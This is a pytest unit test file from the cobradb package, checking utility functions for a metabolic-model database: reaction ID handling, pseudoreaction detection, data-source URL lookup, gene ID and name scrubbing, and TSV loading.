from cobradb.models import *
from cobradb.util import *
from cobradb.util import _find_data_source_url
import pytest
def test_increment_id():
assert increment_id('ACALD_1') == 'ACALD_2'
assert increment_id('ACALD_1a') == 'ACALD_1a_1'
assert increment_id('ACALD') == 'ACALD_1'
assert increment_id('ACALD_9') == 'ACALD_10'
assert increment_id('ACALD_10') == 'ACALD_11'
def test_make_reaction_copy_id():
assert make_reaction_copy_id('ACALD', 3) == 'ACALD_copy3'
def test_check_pseudoreaction():
assert check_pseudoreaction('ATPM') is True
assert check_pseudoreaction('ATPM1') is False
assert check_pseudoreaction('EX_glc_e') is True
assert check_pseudoreaction('aEX_glc_e') is False
assert check_pseudoreaction('SK_glc_e') is True
assert check_pseudoreaction('BIOMASS_objective') is True
assert check_pseudoreaction('BiomassEcoli') is False
assert check_pseudoreaction('DM_8') is True
def test__find_data_source_url():
url_prefs = [['kegg.compound', 'KEGG Compound', 'http://identifiers.org/kegg.compound/']]
assert _find_data_source_url('kegg.compound', url_prefs) == ('kegg.compound', 'KEGG Compound', 'http://identifiers.org/kegg.compound/')
def test__find_data_source_url_no_url():
url_prefs = [['kegg.compound', 'KEGG Compound']]
assert _find_data_source_url('kegg.compound', url_prefs) == ('kegg.compound', 'KEGG Compound', None)
def test__find_data_source_url_synonym():
url_prefs = [['kegg.compound', 'KEGG Compound', '', 'KEGGID,KEGG_ID']]
assert _find_data_source_url('KEGGID', url_prefs) == ('kegg.compound', 'KEGG Compound', None)
assert _find_data_source_url('KEGG_ID', url_prefs) == ('kegg.compound', 'KEGG Compound', None)
def test_get_or_create_data_source(test_db, session, tmpdir):
prefsfile = str(tmpdir.join('data_source_preferences.txt'))
with open(prefsfile, 'w') as f:
f.write('my_data_source\tname\tmy_url_prefix')
settings.data_source_preferences = prefsfile
get_or_create_data_source(session, 'my_data_source')
assert (session
.query(DataSource)
.filter(DataSource.bigg_id == 'my_data_source')
.filter(DataSource.name == 'name')
.filter(DataSource.url_prefix == 'my_url_prefix')
.count()) == 1
def test_format_formula():
assert format_formula("['abc']") == 'abc'
def test_scrub_gene_id():
assert scrub_gene_id('1234.5') == '1234_AT5'
assert scrub_gene_id('1234.56') == '1234_AT56'
assert scrub_gene_id('1234.56a') == '1234_56a'
assert scrub_gene_id('asdkf@#%*(@#$sadf') == 'asdkf________sadf'
def test_scrub_name():
assert scrub_name('retpalm_SPACE_deleted_SPACE_10_09_2005_SPACE_SPACE_06_COLON_18_COLON_49_SPACE_PM') == 'Retpalm deleted 10 09 2005 06:18:49 PM'
assert scrub_name('R_ammonia_reversible_transport') == 'Ammonia reversible transport'
assert scrub_name('_ammonia_reversible_transport') == 'Ammonia reversible transport'
assert scrub_name(None) == None
assert scrub_name('_ ') == None
def test_load_tsv(tmpdir):
# test file
a_file = tmpdir.join('temp.txt')
a_file.write('# ignore\tignore\na\ttest \n\n')
# run the test
rows = load_tsv(str(a_file))
assert rows == [['a', 'test']]
# with required_column_num
rows = load_tsv(str(a_file), required_column_num=3)
assert rows == []
|
SBRG/ome
|
cobradb/tests/test_util.py
|
Python
|
mit
| 3,409
|